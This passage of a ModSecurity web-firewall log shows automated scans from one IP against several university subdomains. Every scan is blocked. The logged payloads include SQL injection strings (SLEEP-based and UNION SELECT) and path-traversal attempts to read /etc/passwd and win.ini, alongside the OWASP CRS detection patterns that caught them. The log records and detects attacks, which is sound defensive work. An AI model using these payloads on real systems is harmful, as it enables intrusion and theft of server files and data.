"OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO125sCo-f0AAAc5Sk4AAAAQ"]
[Tue Aug 29 11:41:10.398532 2023] [:error] [pid 1847] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:email: 2UdyWmaXpTq91nUrOZ0geHP3XoU@test.com' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO125sCo-f0AAAc36tAAAAAO"]
[Tue Aug 29 11:41:10.420005 2023] [:error] [pid 1847] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:controller: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO125sCo-f0AAAc36tEAAAAO"]
[Tue Aug 29 11:41:10.424244 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:email: 2UdyWmaXpTq91nUrOZ0geHP3XoU@test.com' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO125sCo-f0AAAcqJJgAAAAG"]
[Tue Aug 29 11:41:10.439703 2023] [:error] [pid 1847] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:email: 2UdyWmaXpTq91nUrOZ0geHP3XoU@test.com' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO125sCo-f0AAAc36tIAAAAO"]
[Tue Aug 29 11:41:10.440318 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:csftyp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:csftyp: classic ssfile1=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/broker"] [unique_id "ZO125sCo-f0AAAYf-OEAAAAD"]
[Tue Aug 29 11:41:10.485161 2023] [:error] [pid 1849] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:csftyp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:csftyp: classic ssfile1=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/cgi-bin/broker"] [unique_id "ZO125sCo-f0AAAc5SlIAAAAQ"]
[Tue Aug 29 11:41:10.487111 2023] [:error] [pid 1846] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:csftyp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:csftyp: classic ssfile1=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/cgi-bin/broker"] [unique_id "ZO125sCo-f0AAAc2dPMAAAAN"]
[Tue Aug 29 11:41:10.507079 2023] [:error] [pid 1847] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:csftyp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:csftyp: classic ssfile1=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/broker"] [unique_id "ZO125sCo-f0AAAc36tQAAAAO"]
[Tue Aug 29 11:41:10.511644 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:csftyp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:csftyp: classic ssfile1=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/broker"] [unique_id "ZO125sCo-f0AAAcqJJsAAAAG"]
[Tue Aug 29 11:41:11.363646 2023] [:error] [pid 1847] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:csftyp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:csftyp: classic ssfile1=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/cgi-bin/broker"] [unique_id "ZO1258Co-f0AAAc36tUAAAAO"]
[Tue Aug 29 11:41:11.387267 2023] [:error] [pid 1842] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:email: 2UdyWmaXpTq91nUrOZ0geHP3XoU@test.com' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO1258Co-f0AAAcyp1oAAAAK"]
[Tue Aug 29 11:41:13.359870 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:certfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:certfile: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/cert_download.php"] [unique_id "ZO126cCo-f0AAAcoNTkAAAAF"]
[Tue Aug 29 11:41:13.381663 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:certfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:certfile: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/admin/cert_download.php"] [unique_id "ZO126cCo-f0AAAcoNToAAAAF"]
[Tue Aug 29 11:41:13.487700 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:certfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:certfile: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/admin/cert_download.php"] [unique_id "ZO126cCo-f0AAAYf-PcAAAAD"]
[Tue Aug 29 11:41:13.501493 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:certfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:certfile: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/admin/cert_download.php"] [unique_id "ZO126cCo-f0AAAaZ9osAAAAo"]
[Tue Aug 29 11:41:13.511433 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:certfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:certfile: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/admin/cert_download.php"] [unique_id "ZO126cCo-f0AAActbJIAAAAH"]
[Tue Aug 29 11:41:15.445654 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:previewFilePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:previewFilePath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/analytics/saw.dll"] [unique_id "ZO1268Co-f0AAActbKUAAAAH"]
[Tue Aug 29 11:41:15.504388 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:previewFilePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:previewFilePath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/analytics/saw.dll"] [unique_id "ZO1268Co-f0AAAaZ9poAAAAo"]
[Tue Aug 29 11:41:15.524498 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:certfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:certfile: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/admin/cert_download.php"] [unique_id "ZO1268Co-f0AAAcqJLQAAAAG"]
[Tue Aug 29 11:41:15.525622 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:previewFilePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:previewFilePath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/analytics/saw.dll"] [unique_id "ZO1268Co-f0AAAc4ElYAAAAP"]
[Tue Aug 29 11:41:15.527582 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:previewFilePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:previewFilePath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/analytics/saw.dll"] [unique_id "ZO1268Co-f0AAAcoNUUAAAAF"]
[Tue Aug 29 11:41:16.368132 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:previewFilePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:previewFilePath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/analytics/saw.dll"] [unique_id "ZO127MCo-f0AAAc4ElcAAAAP"]
[Tue Aug 29 11:41:17.507108 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:previewFilePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:previewFilePath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/analytics/saw.dll"] [unique_id "ZO127cCo-f0AAAcoNU4AAAAF"]
[Tue Aug 29 11:41:18.359834 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -6' union select 1,md5('999999999'),3,4,5,6,7,8,9,10,11-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/admin/"] [unique_id "ZO127sCo-f0AAAcoNU8AAAAF"]
[Tue Aug 29 11:41:18.400236 2023] [:error] [pid 1842] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -6' union select 1,md5('999999999'),3,4,5,6,7,8,9,10,11-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/admin/"] [unique_id "ZO127sCo-f0AAAcyp24AAAAK"]
[Tue Aug 29 11:41:18.405371 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -6' union select 1,md5('999999999'),3,4,5,6,7,8,9,10,11-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/admin/"] [unique_id "ZO127sCo-f0AAAaZ9qMAAAAo"]
[Tue Aug 29 11:41:18.596189 2023] [:error] [pid 1842] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/register/toDownload.do"] [unique_id "ZO127sCo-f0AAAcyp3AAAAAK"]
[Tue Aug 29 11:41:18.630575 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -6' union select 1,md5('999999999'),3,4,5,6,7,8,9,10,11-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/admin/"] [unique_id "ZO127sCo-f0AAAcbSD8AAAAv"]
[Tue Aug 29 11:41:18.631098 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -6' union select 1,md5('999999999'),3,4,5,6,7,8,9,10,11-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/"] [unique_id "ZO127sCo-f0AAAcqJL0AAAAG"]
